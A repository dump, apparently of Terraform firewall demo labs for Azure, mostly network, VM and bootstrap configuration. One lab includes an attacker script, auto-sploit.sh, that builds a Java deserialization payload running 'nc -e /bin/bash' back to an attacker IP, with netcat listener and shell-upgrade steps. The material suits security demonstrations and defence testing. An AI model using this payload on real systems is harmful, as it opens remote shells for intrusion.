12 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
13 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
14 | echo "    ports:" >> docker-compose.yml
15 | echo "      - \"50000:50000\"" >> docker-compose.yml
16 | echo "      - \"8080:8080\"" >> docker-compose.yml
17 | docker-compose up -d
18 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile
 8 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml
 9 | wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh
10 | docker-compose build
11 | docker-compose up -d
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf:
--------------------------------------------------------------------------------
 1 | 
 2 | variable "FW_Mgmt_IP" {}
 3 | variable "FW_Untrust_IP" {}
 4 | variable "Web_IP" {}
 5 | variable "LB_IP" {}
 6 | variable "Admin_Username" {}
 7 | variable "Admin_Password" {}
 8 | variable "FW_Default_GW" {}
 9 | variable "FW_Internal_GW" {}
10 | variable "Web_Subnet_CIDR" {}


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | Admin_Username = "<Admin Username>"
 2 | 
 3 | Admin_Password = "<Admin Password>"
 4 | 
 5 | FW_Untrust_IP = "10.0.1.10"
 6 | 
 7 | LB_IP = "10.0.4.10"
 8 | 
 9 | Web_IP = "10.0.4.50"
10 | 
11 | FW_Default_GW = "10.0.1.1"
12 | 
13 | Web_Subnet_CIDR = "10.0.4.0/24"
14 | 
15 | FW_Internal_GW = "10.0.2.1"


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/attacker/auto-sploit.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash 
 2 | 
 3 | echo
 4 | echo "*******************************************************************"
 5 | echo
 6 | echo "Open another terminal window and run a netcat listener: nc -lvp 443"
 7 | echo
 8 | echo "Run the following command  to spawn a shell once the reverse connection establishes:"
 9 | echo 
10 | echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" 
11 | echo
12 | read -n 1 -s -r -p "Once the above is complete - press any key to continue"
13 | 
14 | echo
15 | echo "Enter Attacker IP Address:"
16 | echo
17 | 
18 | read attacker
19 | 
20 | echo "Creating Payload with IP address" $attacker
21 | echo
22 | 
23 | java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" 
24 | 
25 | echo "Payload successfully created and saved as 'payload.ser'"
26 | echo 
27 | 
28 | echo "Executing exploit..."
29 | echo
30 | 
31 | python3 exploit.py
32 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/attacker/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 |   attacker:
4 |     build: .
5 |     container_name: attacker
6 |     ports:
7 |       - "443:443"
8 |       - "5000:5000"
9 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/attacker/run.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | # Running nc on an unexposed port to keep the container up
 4 | 
 5 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 6 | 
 7 |   exec nc -l -p 56789 "$@"
 8 | 
 9 | fi
10 | 
11 | exec "$@"
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/azure_login.py:
--------------------------------------------------------------------------------
 1 | from azure import cli
 2 | from azure.cli.core import get_default_cli
 3 | import sys
 4 | 
 5 | sys.sterr = sys.stdout
 6 | 
 7 | print('Logging in to Azure using device code')
 8 | 
 9 | get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
10 | pass


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/deployment_status.json:
--------------------------------------------------------------------------------
1 | {"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", "value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"}


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/jenkins/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | services:
 3 |   jenkins:
 4 |     build: .
 5 |     container_name: jenkins
 6 |     environment:
 7 |       JAVA_OPTS: "-Djava.awt.headless=true"
 8 |       JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
 9 |     ports:
10 |       - "50000:50000"
11 |       - "8080:8080"
12 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/jenkins/jenkins.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | : "${JENKINS_HOME:="/var/jenkins_home"}"
 4 | touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
 5 | echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
 6 | 
 7 | # if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
 8 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 9 | 
10 |   # read JAVA_OPTS and JENKINS_OPTS into arrays
11 |   java_opts_array=()
12 |   while IFS= read -r -d '' item; do
13 |     java_opts_array+=( "$item" )
14 |   done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
15 | 
16 |   jenkins_opts_array=( )
17 |   while IFS= read -r -d '' item; do
18 |     jenkins_opts_array+=( "$item" )
19 |   done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
20 | 
21 |   exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
22 | fi
23 | 
24 | exec "$@"
25 | 


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/jenkins/tini:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/jenkins/tini


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar


--------------------------------------------------------------------------------
/azure/Jenkins_proj-working/payload/payload.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/Jenkins_proj-working/payload/payload.jar


--------------------------------------------------------------------------------
/azure/README.md:
--------------------------------------------------------------------------------
1 | Terraform for Azure.
2 | 


--------------------------------------------------------------------------------
/azure/panorama_new_rg/interfaces.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE NETWORK INTERFACES ####
 2 | 
 3 | resource "azurerm_network_interface" "panorama" {
 4 | 	name								= "${var.networkInterfaceName}"
 5 | 	location            = "${azurerm_resource_group.resourcegroup.location}"
 6 | 	resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
 7 | 	ip_configuration {
 8 | 		name							              = "${var.networkInterfaceName}"
 9 | 		subnet_id						            = "${azurerm_subnet.panorama.id}"
10 | 		private_ip_address_allocation 	= "Dynamic"
11 | 		public_ip_address_id            = "${azurerm_public_ip.panorama.id}"
12 | 	}
13 | 	depends_on = ["azurerm_public_ip.panorama"]
14 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/outputs.tf:
--------------------------------------------------------------------------------
1 | output "Panorama Public IP:" {
2 |   value = "${azurerm_public_ip.panorama.ip_address}"
3 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/public-ips.tf:
--------------------------------------------------------------------------------
1 | #### CREATE PUBLIC IP ADDRESSES ####
2 | resource "azurerm_public_ip" panorama {
3 | 	name                = "${var.publicIpAddressName}"
4 | 	location						= "${azurerm_resource_group.resourcegroup.location}"
5 | 	resource_group_name	= "${azurerm_resource_group.resourcegroup.name}"
6 | 	allocation_method   = "Static"
7 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/resource-group.tf:
--------------------------------------------------------------------------------
 1 | //# ********** RESOURCE GROUP **********
 2 | //# Configure the Providers
 3 | provider "azurerm" {}
 4 | provider "random" {}
 5 | 
 6 | //# Create a resource group
 7 | resource "azurerm_resource_group" "resourcegroup" {
 8 | 	name		= "${var.virtualMachineRG}"
 9 | 	location	= "${var.Location}"
10 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/route-tables.tf:
--------------------------------------------------------------------------------
 1 | #### CREATE THE ROUTE TABLES ####
 2 | 
 3 | resource "azurerm_route_table" "panorama" {
 4 |   name                = "panorama"
 5 |   location            = "${azurerm_resource_group.resourcegroup.location}"
 6 |   resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
 7 |   route {
 8 |     name           = "internet"
 9 |     address_prefix = "0.0.0.0/0"
10 |     next_hop_type  = "internet"
11 |   }
12 | }
13 | 
14 | resource "azurerm_subnet_route_table_association" "panorama" {
15 |   subnet_id      = "${azurerm_subnet.panorama.id}"
16 |   route_table_id = "${azurerm_route_table.panorama.id}"
17 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/storage-account.tf:
--------------------------------------------------------------------------------
 1 | # Storage account for boot diagnostics
 2 | resource "random_id" "storage_account" {
 3 |   byte_length = 4
 4 | }
 5 | resource "azurerm_storage_account" "mystorageaccount" {
 6 |   name                      = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}"
 7 | 	location						      = "${azurerm_resource_group.resourcegroup.location}"
 8 | 	resource_group_name       = "${azurerm_resource_group.resourcegroup.name}"
 9 |   account_tier              = "${var.diagnosticsStorageAccountTier}"
10 |   account_replication_type  = "${var.diagnosticsStorageAccountReplication}"
11 | }


--------------------------------------------------------------------------------
/azure/panorama_new_rg/terraform.tfvars.sample:
--------------------------------------------------------------------------------
 1 | virtualMachineRG = "<Name of resource group to create>"
 2 | 
 3 | Location = "<Target Azure region>"
 4 | 
 5 | virtualNetworkName = "<Virtual Network Name>"
 6 | 
 7 | addressPrefix = "<VNet CIDR>"
 8 | 
 9 | subnetName = "<Subnet name in the VNet>"
10 | 
11 | subnet = "<Subnet CIDR>"
12 | 
13 | publicIpAddressName = "<Panorama public IP address name>"
14 | 
15 | networkInterfaceName = "<Panorama network interface name>"
16 | 
17 | networkSecurityGroupName = "<Network Security Group (NSG) name>"
18 | 
19 | diagnosticsStorageAccountName = "<Diagnostics Storage Account name>"
20 | 
21 | diagnosticsStorageAccountTier = "<Diagnostics Storage Account tier>"
22 | 
23 | diagnosticsStorageAccountReplication = "<Diagnostics Storage Account replication>"
24 | 
25 | virtualMachineName = "<Panorama VM name>"
26 | 
27 | virtualMachineSize = "<Panorama VM size>"
28 | 
29 | panoramaVersion = "<Panorama Version>"
30 | 
31 | adminUsername = "<Admin Username>"
32 | 
33 | adminPassword = "<Admin Password>"


--------------------------------------------------------------------------------
/azure/panorama_new_rg/vnet-subnets.tf:
--------------------------------------------------------------------------------
 1 | # ********** VNET **********
 2 | 
 3 | # Create a virtual network
 4 | resource "azurerm_virtual_network" "vnet" {
 5 |   name				        = "${var.virtualNetworkName}"
 6 |   address_space		    = ["${var.addressPrefix}"]
 7 |   location		        = "${azurerm_resource_group.resourcegroup.location}"
 8 |   resource_group_name	= "${azurerm_resource_group.resourcegroup.name}"
 9 | }
10 | 
11 | # Create the subnet
12 | 
13 | resource "azurerm_subnet" "panorama" {
14 |   name                 = "${var.subnetName}"
15 |   resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
16 |   virtual_network_name = "${azurerm_virtual_network.vnet.name}"
17 |   address_prefix       = "${var.subnet}"
18 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/GUIDE.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common/GUIDE.pdf


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/bootstrap_files/common_fw/config/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | panorama-server=
11 | vm-auth-key=
12 | dgname=
13 | tplname=
14 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/bootstrap_files/common_fw/content/.gitignore:
--------------------------------------------------------------------------------
1 | *
2 | !.gitignore
3 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/bootstrap_files/common_fw/license/authcodes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common/bootstrap_files/common_fw/license/authcodes


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/bootstrap_files/common_fw/software/.gitignore:
--------------------------------------------------------------------------------
1 | *
2 | !.gitignore
3 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/images/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common/images/diagram.png


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/images/tfvars.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common/images/tfvars.png


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output file_share_name {
2 |   value = azurerm_storage_share.main.name
3 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/azure_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable storage_account_name {
 2 | }
 3 | 
 4 | variable storage_account_key {
 5 | }
 6 | 
 7 | variable name {
 8 | }
 9 | 
10 | variable quota {
11 | }
12 | 
13 | variable local_file_path {
14 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/lb/outputs.tf:
--------------------------------------------------------------------------------
1 | output public_ip {
2 |   value = azurerm_public_ip.main.*.ip_address
3 | }
4 | 
5 | output backend_pool_id {
6 |   value = azurerm_lb_backend_address_pool.main.id
7 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/peering/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vnet_peer_1_id {
 2 |   description = "The id of the newly created virtual network peering in on first virtual netowork. "
 3 |   value       = azurerm_virtual_network_peering.vnet_peer_1.id
 4 | }
 5 | 
 6 | output vnet_peer_2_id {
 7 |   description = "The id of the newly created virtual network peering in on second virtual netowork. "
 8 |   value       = azurerm_virtual_network_peering.vnet_peer_2.id
 9 | }
10 | 
11 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/spoke_vm/outputs.tf:
--------------------------------------------------------------------------------
1 | output nic0_id {
2 |   value = azurerm_network_interface.main.*.id
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/spoke_vm/variables.tf:
--------------------------------------------------------------------------------
 1 | # variable vm_names {
 2 | #   type    = list(string)
 3 | #   default = ["azure-vm"]
 4 | # }
 5 | variable vm_count {
 6 | }
 7 | 
 8 | variable name {
 9 | 
10 | }
11 | 
12 | variable subnet_id {
13 | }
14 | 
15 | variable location {
16 | }
17 | 
18 | variable resource_group_name {
19 | }
20 | 
21 | variable username {
22 | }
23 | 
24 | variable password {
25 | }
26 | 
27 | variable availability_set_id {
28 |   default = ""
29 | }
30 | 
31 | variable custom_data {
32 |   default = ""
33 | }
34 | 
35 | variable publisher {
36 |   default = "Canonical"
37 | }
38 | 
39 | variable offer {
40 |   default = "UbuntuServer"
41 | }
42 | 
43 | variable sku {
44 |   default = "16.04-LTS"
45 | }
46 | 
47 | variable backend_pool_id {
48 |   type = list(string)
49 |   default = []
50 | }
51 | 
52 | variable tags {
53 |   type = map(string)
54 | 
55 |   default = {
56 |     tag1 = ""
57 |     tag2 = ""
58 |   }
59 | }
60 | 
61 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/vmseries/outputs.tf:
--------------------------------------------------------------------------------
 1 | output nic0_id {
 2 |   value = azurerm_network_interface.nic0.*.id
 3 | }
 4 | 
 5 | output nic1_id {
 6 |   value = azurerm_network_interface.nic1.*.id
 7 | }
 8 | 
 9 | output nic2_id {
10 |   value = azurerm_network_interface.nic2.*.id
11 | }
12 | 
13 | output nic1_public_ip {
14 |   value = azurerm_public_ip.nic1.*.ip_address
15 | }
16 | 
17 | output nic0_public_ip {
18 |   value = azurerm_public_ip.nic0.*.ip_address
19 | }
20 | 
21 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/vnet/main.tf:
--------------------------------------------------------------------------------
 1 | resource "azurerm_virtual_network" "main" {
 2 |   name                = var.name
 3 |   location            = var.location
 4 |   address_space       = [var.vnet_cidr]
 5 |   resource_group_name = var.resource_group_name
 6 |   dns_servers         = var.dns_servers
 7 |   tags                = var.tags
 8 | }
 9 | 
10 | resource "azurerm_subnet" "main" {
11 |   count                = length(var.subnet_cidrs)
12 |   name = var.subnet_names != null ? element(var.subnet_names, count.index) :  "${var.name}-subnet${count.index + 1}"
13 | 
14 |   virtual_network_name = azurerm_virtual_network.main.name
15 |   resource_group_name  = var.resource_group_name
16 |   address_prefixes       = [element(var.subnet_cidrs, count.index)]
17 | }
18 | 
19 | resource "azurerm_subnet_route_table_association" "main" {
20 |   count          = var.route_table_ids != null ? length(var.subnet_cidrs)  : 0
21 |   route_table_id = element(var.route_table_ids, count.index)
22 |   subnet_id      = element(azurerm_subnet.main.*.id, count.index)
23 |   depends_on = [
24 |     azurerm_subnet.main
25 |   ]
26 | }
27 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/modules/vnet/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vnet_id {
 2 |   description = "The id of the newly created vNet"
 3 |   value       = azurerm_virtual_network.main.id
 4 | }
 5 | 
 6 | output vnet_name {
 7 |   description = "The Name of the newly created vNet"
 8 |   value       = azurerm_virtual_network.main.name
 9 | }
10 | 
11 | output vnet_location {
12 |   description = "The location of the newly created vNet"
13 |   value       = azurerm_virtual_network.main.location
14 | }
15 | 
16 | output vnet_address_space {
17 |   description = "The address space of the newly created vNet"
18 |   value       = azurerm_virtual_network.main.address_space
19 | }
20 | 
21 | output subnet_ids {
22 |   description = "The ids of subnets created inside the newl vNet"
23 |   value       = azurerm_subnet.main.*.id
24 | }
25 | 
26 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/providers.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = "~> 1.2"
 3 | }
 4 | 
 5 | provider "azurerm" {
 6 |   #version         = "= 1.41"  "~> 2.40.0"
 7 | #  subscription_id = var.subscription_id
 8 | #  client_id       = var.client_id
 9 | #  client_secret   = var.client_secret
10 | #  tenant_id       = var.tenant_id
11 |   features {}
12 | }
13 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common/scripts/web_startup.yml.tpl:
--------------------------------------------------------------------------------
 1 | #cloud-config
 2 | 
 3 | runcmd:
 4 |   - sudo apt-get update -y
 5 |   - sudo apt-get install -y php
 6 |   - sudo apt-get install -y apache2
 7 |   - sudo apt-get install -y libapache2-mod-php
 8 |   - sudo rm -f /var/www/html/index.html
 9 |   - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
10 |   - sudo systemctl restart apache2


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt:
--------------------------------------------------------------------------------
1 | type=dhcp-client
2 | ip-address=
3 | default-gateway=
4 | netmask=
5 | ipv6-address=
6 | ipv6-default-gateway=
7 | dhcp-accept-server-hostname=yes
8 | dns-primary=8.8.8.8
9 | dns-secondary=4.2.2.2


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore:
--------------------------------------------------------------------------------
1 | *
2 | !.gitignore


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore:
--------------------------------------------------------------------------------
1 | *
2 | !.gitignore


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/images/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common_appgw/images/diagram.png


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf:
--------------------------------------------------------------------------------
1 | output appgw_fqdn {
2 |   value = azurerm_public_ip.appgw.fqdn
3 | }
4 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf:
--------------------------------------------------------------------------------
 1 | variable "location" {
 2 |   description = "Location of the resource group to place App Gateway in."
 3 | }
 4 | 
 5 | variable "resource_group_name" {
 6 |   description = "Name of the resource group to place App Gateway in."
 7 | }
 8 | 
 9 | variable "subnet_appgw" {
10 |   description = "AppGW Subnet"
11 | }
12 | 
13 | variable "fw_private_ips" {
14 |   description = "list of private IP addresses from the deployed FW"
15 |   type = list(string)
16 |   default = null
17 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/outputs.tf:
--------------------------------------------------------------------------------
1 | output file_share_name {
2 |   value = azurerm_storage_share.main.name
3 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/variables.tf:
--------------------------------------------------------------------------------
 1 | variable storage_account_name {
 2 | }
 3 | 
 4 | variable storage_account_key {
 5 | }
 6 | 
 7 | variable name {
 8 | }
 9 | 
10 | variable quota {
11 | }
12 | 
13 | variable local_file_path {
14 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/lb/outputs.tf:
--------------------------------------------------------------------------------
1 | output public_ip {
2 |   value = azurerm_public_ip.main.*.ip_address
3 | }
4 | 
5 | output backend_pool_id {
6 |   value = azurerm_lb_backend_address_pool.main.id
7 | }


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/peering/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vnet_peer_1_id {
 2 |   description = "The id of the newly created virtual network peering in on first virtual netowork. "
 3 |   value       = azurerm_virtual_network_peering.vnet_peer_1.id
 4 | }
 5 | 
 6 | output vnet_peer_2_id {
 7 |   description = "The id of the newly created virtual network peering in on second virtual netowork. "
 8 |   value       = azurerm_virtual_network_peering.vnet_peer_2.id
 9 | }
10 | 
11 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/outputs.tf:
--------------------------------------------------------------------------------
1 | output nic0_id {
2 |   value = azurerm_network_interface.main.*.id
3 | }
4 | 
5 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/variables.tf:
--------------------------------------------------------------------------------
 1 | # variable vm_names {
 2 | #   type    = list(string)
 3 | #   default = ["azure-vm"]
 4 | # }
 5 | variable vm_count {
 6 | }
 7 | 
 8 | variable name {
 9 | 
10 | }
11 | 
12 | variable subnet_id {
13 | }
14 | 
15 | variable location {
16 | }
17 | 
18 | variable resource_group_name {
19 | }
20 | 
21 | variable username {
22 | }
23 | 
24 | variable password {
25 | }
26 | 
27 | variable availability_set_id {
28 |   default = ""
29 | }
30 | 
31 | variable custom_data {
32 |   default = ""
33 | }
34 | 
35 | variable publisher {
36 |   default = "Canonical"
37 | }
38 | 
39 | variable offer {
40 |   default = "UbuntuServer"
41 | }
42 | 
43 | variable sku {
44 |   default = "16.04-LTS"
45 | }
46 | 
47 | variable backend_pool_id {
48 |   type = list(string)
49 |   default = []
50 | }
51 | 
52 | variable tags {
53 |   type = map(string)
54 | 
55 |   default = {
56 |     tag1 = ""
57 |     tag2 = ""
58 |   }
59 | }
60 | 
61 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/outputs.tf:
--------------------------------------------------------------------------------
 1 | output nic0_id {
 2 |   value = azurerm_network_interface.nic0.*.id
 3 | }
 4 | 
 5 | output nic1_id {
 6 |   value = azurerm_network_interface.nic1.*.id
 7 | }
 8 | 
 9 | output nic2_id {
10 |   value = azurerm_network_interface.nic2.*.id
11 | }
12 | 
13 | output nic1_public_ip {
14 |   value = azurerm_public_ip.nic1.*.ip_address
15 | }
16 | 
17 | output nic1_private_ip {
18 |   value = azurerm_network_interface.nic1.*.private_ip_address
19 | }
20 | 
21 | 
22 | output nic0_public_ip {
23 |   value = azurerm_public_ip.nic0.*.ip_address
24 | }
25 | 
26 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/modules/vnet/outputs.tf:
--------------------------------------------------------------------------------
 1 | output vnet_id {
 2 |   description = "The id of the newly created vNet"
 3 |   value       = azurerm_virtual_network.main.id
 4 | }
 5 | 
 6 | output vnet_name {
 7 |   description = "The Name of the newly created vNet"
 8 |   value       = azurerm_virtual_network.main.name
 9 | }
10 | 
11 | output vnet_location {
12 |   description = "The location of the newly created vNet"
13 |   value       = azurerm_virtual_network.main.location
14 | }
15 | 
16 | output vnet_address_space {
17 |   description = "The address space of the newly created vNet"
18 |   value       = azurerm_virtual_network.main.address_space
19 | }
20 | 
21 | output subnet_ids {
22 |   description = "The ids of subnets created inside the newl vNet"
23 |   value       = azurerm_subnet.main.*.id
24 | }
25 | 
26 | 


--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/providers.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = "~> 0.14"
 3 | }
 4 | 
 5 | provider "azurerm" {
 6 |   #version         = "= 1.41"  "~> 2.40.0"
 7 | #  subscription_id = var.subscription_id
 8 | #  client_id       = var.client_id
 9 | #  client_secret   = var.client_secret
10 | #  tenant_id       = var.tenant_id
11 |   features {}
12 | }
13 | 


